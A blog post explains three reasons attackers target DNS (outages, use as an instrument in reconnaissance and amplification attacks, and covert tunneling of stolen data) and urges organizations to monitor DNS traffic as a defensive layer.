Why would anyone want to attack DNS?

The Domain Name System (DNS) makes the Internet usable for humans. It is fundamental to the proper operation of virtually all Internet Protocol (IP) network applications, from web browsing to email, from messaging to multi-media applications and more. By its very nature, the global Internet DNS system serves as a distributed data repository containing domain names (e.g., web addresses) and corresponding IP address information. DNS has proven extremely effective and scalable in practice and most people take DNS for granted given its proven reliability. However, its essential function and decentralized architecture serve to attract attackers seeking to exploit its distributed structure and rich data store for sinister activities.

Every time you enter a web address or send an email, you use DNS. DNS translates human-readable "www" names into computer-readable binary addresses. This translation service is more commonly referred to as a name resolution process, whereby a web address is resolved to its IP address. And a given web page may stimulate several DNS lookups, with encoded hypertext reference (href), source (src) and other tags that contain a unique domain name. Each of these stimulate your browser to perform a DNS lookup to fetch the referenced image, video, file or script, and perhaps pre-fetch links. And each time you click a link to navigate to a new page, the process repeats with successive DNS lookups required to fully render the destination page.

Email relies on DNS for message delivery, enabling you to send email using the familiar user@destination syntax, where DNS identifies the destination’s IP address for transmission of the message. And DNS goes well beyond web or email address resolution. Virtually every application on your computer, tablet, smartphone, security cameras, thermostats and other “things” that access the Internet require DNS for proper operation. Without DNS, navigating and accessing Internet applications would be all but impossible.

This leads to our first motivator for attacking DNS: to wreak havoc! An outage or an attack that renders your DNS service unavailable or which manipulates the integrity of the data contained within DNS can effectively bring a network down from an end user perspective. Even if network connectivity exists, you won't be able to connect unless of course you already know the IP address of the site to which you’d like to connect, which would certainly evince you as uniquely talented. But even with such brilliance, you may be able to connect, but you wouldn’t see any linked images or content which rely on DNS for location and rendering.

A second motivator for an attacker is to use DNS as an instrument in a broader attack. DNS can be queried as reconnaissance to identify potential targets. Just as DNS is the first step in allowing legitimate users to connect to websites, it is likewise usable by bad actors to connect to internal targets within your enterprise and external command and control (C&C) centers for updates and directives to perform nefarious tasks. Reflection or amplification is another attack form which utilizes DNS as an attack instrument. DNS queries are sent to DNS servers using a spoofed source IP address. This spoofed address, the attack target, will receive the responses for these queries, which in large volumes can deny service at the target.

The third and potentially most menacing motivator is the use of DNS as covert transport.  Given the foundational necessity of DNS, DNS traffic is generally permitted to flow freely through networks, exposing networks to attacks that leverage this freedom of communications for name resolution or for tunneling of data out of the organization. The stolen data is encoded as DNS queries and transmitted to the attacker's tunnel endpoint, which appears as an authoritative DNS server. This "DNS server" decodes the DNS query, exposing the stolen information.

Many organizations secure DNS servers as they do other network infrastructure, primarily to avert service outages per the first motivator. However many do not take effective steps against the second two. While DNS must freely traverse your networks given its critical function, it's advisable to take a closer look at your DNS traffic to determine how it may be serving a role in attacks elsewhere or to export sensitive data. Monitoring DNS traffic provides an additional stream of information that can be used to help identify and troubleshoot attack incidents. Consider adding a DNS layer to your defense in depth security approach. This DNS layer is comprised of several tactics which I'll discuss in future posts that can help you identify and mitigate DNS attacks.

Comments

Popular posts from this blog

Handy AAAA filter in BIND 9.8

Inglorious DDI

BIND 9.8.0 Adds DNS64 Support - Part 2 - How is it configured?